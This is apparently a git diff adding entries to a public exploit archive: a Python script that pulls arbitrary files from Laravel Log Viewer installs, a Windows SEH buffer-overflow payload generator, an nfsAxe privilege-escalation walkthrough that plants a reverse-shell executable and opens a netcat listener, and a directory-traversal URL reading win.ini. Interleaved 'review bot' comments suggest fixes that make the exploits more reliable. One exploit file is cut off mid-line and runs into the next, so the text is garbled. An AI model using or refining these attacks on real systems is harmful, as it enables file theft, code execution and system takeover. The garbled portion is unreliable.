diff --git a/exploits/php/webapps/44343.py b/exploits/php/webapps/44343.py
new file mode 100755
index 000000000..395674fa0
--- /dev/null
+++ b/exploits/php/webapps/44343.py
@@ -0,0 +1,53 @@
+# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)
+# Date: 23/02/2018
+# Exploit Author: Haboob Team
+# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1
+# Version: v0.12.0 and below
+# CVE : CVE-2018-8947
+
+
+1. Description
+
+Unauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.
+
+
+2. Proof of Concept
+
+#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there
+
+import os
+import base64
+from urllib2 import urlopen, URLError, HTTPError
+import argparse
+import cookielib
+parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')
+parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True)
+parser.add_argument("-f", action="store", dest="file", help="Target File", required=True)
+
+args = parser.parse_args()
+url = str(args.url).strip()+"/logs/?dl="
+final_file= args.file
+if not os.path.exists("./0Grats0"):
+ os.makedirs("./0Grats0")
+
+word = str(args.file).split('/')
+word1= "./0Grats0/"+word[-1]
+finalee=url+base64.b64encode(final_file)
+
+try:
+ f = urlopen(finalee)
+ with open(word1, "wb") as local_file:
+ local_file.write(f.read())
+except HTTPError, e:
+ print "HTTP Error:", e.code, finalee
+except URLError, e:
+ print "URL Error:", e.reason, finalee
+
+
+
+
+
+3. Solution:
+
+Update to version v0.13.0
+https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0
\ No newline at end of file
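Review bot: `url = str(args.url).strip()+"/logs/?dl="` appends `/logs/` to the URL exactly as given, so the trailing slash the PoC comment asks for produces `//logs/?dl=`; `str(args.url).strip().rstrip('/') + "/logs/?dl="` accepts both forms. Nothing checks that a 200 response is actually the requested file rather than the viewer's own HTML page, so a miss is silently saved under `./0Grats0/<basename>` as if it were the target; inspecting `f.info().getheader('Content-Disposition')` before writing would distinguish the two. The `urlopen` handle `f` is never closed, and `import cookielib` is unused.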
diff --git a/exploits/windows/local/44341.py b/exploits/windows/local/44341.py
new file mode 100755
index 000000000..958e84e01
--- /dev/null
+++ b/exploits/windows/local/44341.py
@@ -0,0 +1,58 @@ +# SWAMI KARUPASAMI THUNAI +# +############################################################################### +# Exploit Title: Stack Based Buffer Overflow in Allok Fast AVI MPEG Splitter 1.2 (Windows XP SP3) +# Date: 06-03-2018 +# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj +# Organization : TwinTech Solutions +# Vulnerable Software: Allok Fast AVI MPEG Splitter 1.2 +# Vendor Homepage: http://www.alloksoft.com +# Version: 1.2 +# Software Link: http://www.alloksoft.com/allok_vconverter.exe +# Tested On: Windows XP Service Pack 3 (Version 2002) & windows 7 x64 Ultimate +# +# Credit to Velayutham Selvaraj for discovering the Vulnerbility +# Vulnerability Disclosure Date : 2018-03-06 +# +# Manual steps to reproduce the vulnerability ... +#1. Download and install the "setup(allok_fast_avimpegsplitter.exe)" file +#2. Run this exploit code via python 2.7 +#3. A file "exploit.txt" will be created +#4. Copy the contents of the file and paste in the License Name field +# Name > exploit.txt +#5. Type some random character in License Code +#6. Click Register and voila ! +#7. Boom calculator opens +# +############################################################################## +import struct + +file = open("exploit.txt","wb") +buflen = 4000 +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(" /var/www/html/xsetsrv.exe + +2. Setup listener and start apache on attacking machine + nc -nlvvp 443 + service apache2 start + +3. Download malicious .exe on victim machine + Open browser to http://192.168.0.149/xsetsrv.exe and download + +4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe + xsetsrv.exe > xsetsrv.bak + +5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\ + +6. Restart victim machine and login as unprivileged user + +7. 
Reverse Shell on attacking machine opens
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have access
+to a system running a LabF nfsAxe installed at the default location using a
+low-privileged user account
+
+Risk:
+The vulnerability allows local attackers to escalate privileges and execute
+arbitrary code as Local System aka Game Over.
+
+Fix:
+Don't use default install path
\ No newline at end of file
diff --git a/exploits/windows/remote/44345.txt b/exploits/windows/remote/44345.txt
new file mode 100644
index 000000000..f04c0b9a5
--- /dev/null
+++ b/exploits/windows/remote/44345.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Acrolinx Dashboard Directory Traversal
+# CVE: CVE 2018-7719
+# Date: 19.02.2017
+# Exploit Author: Berk Dusunur
+# Vendor Homepage: www.acrolinx.com
+# Version:Before 5.2.5
+
+PoC
+
+Acrolinx dashboard windows works on the server.
+
+
+http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
+
+http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index de37f582c..64a25b7a0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
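Review bot: `# Date: 19.02.2017` in the 44345.txt header is a year earlier than both the CVE it cites (`CVE 2018-7719`) and the referenced write-up path (`/2018/03/`), so it is most likely a typo for 2018 and should be corrected before the entry is indexed. The PoC is a bare URL using backslash separators; browsers and many HTTP libraries typically rewrite `\` to `/` (and collapse dot segments) in http paths, so the PoC should state that the request must be sent with a client that preserves the raw path, or with the separators encoded as `%5c`, for the traversal to reach the server as written. `Acrolinx dashboard windows works on the server.` is hard to parse — `The Acrolinx dashboard runs on a Windows server, hence the backslash traversal to win.ini.` would make the target and the choice of separator clear.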
@@ -9616,8 +9616,10 @@ id,file,description,date,author,type,platform,port
 44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
 44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux,
 44330,exploits/windows/local/44330.py,"Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow",2018-03-23,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
-44331,exploits/linux/local/44331.py,"Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve )",2018-03-23,"Juan Sacco",local,linux,
+44331,exploits/linux/local/44331.py,"Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)",2018-03-23,"Juan Sacco",local,linux,
 44337,exploits/windows/local/44337.py,"Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)",2018-03-23,"Hashim Jawad",local,windows,
+44341,exploits/windows/local/44341.py,"Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow",2018-03-26,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
+44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
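Review bot: the new `44341` description drops the vendor name that the exploit's own header (`Allok Fast AVI MPEG Splitter 1.2`) and the neighbouring `44330` entry carry, so a catalogue search for Allok advisories will not find it; `44341,exploits/windows/local/44341.py,"Allok Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow",2018-03-26,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,` keeps the index consistent with its sibling. The exploit's header lists both Windows XP SP3 and Windows 7 x64 as tested, which the title could also reflect if the catalogue convention allows it. The exploit body itself is cut off in this view, so the title is only checked against the visible header.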
@@ -16357,6 +16359,7 @@ id,file,description,date,author,type,platform,port
 44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
+44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39039,8 +39042,9 @@ id,file,description,date,author,type,platform,port
 44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
 44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
 44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
-44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
+44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
 44335,exploits/hardware/webapps/44335.js,"TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery",2018-03-23,"Mans van Someren",webapps,hardware,
 44336,exploits/php/webapps/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,webapps,php,
 44339,exploits/php/webapps/44339.txt,"MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting",2018-03-23,0xB9,webapps,php,
 44340,exploits/php/webapps/44340.txt,"Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion",2018-03-23,"Nicolas Buzy-Debat",webapps,php,80
+44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index cf3d76202..0b0cbac92 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -872,4 +872,4 @@ id,file,description,date,author,type,platform
 42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
-44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
+44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86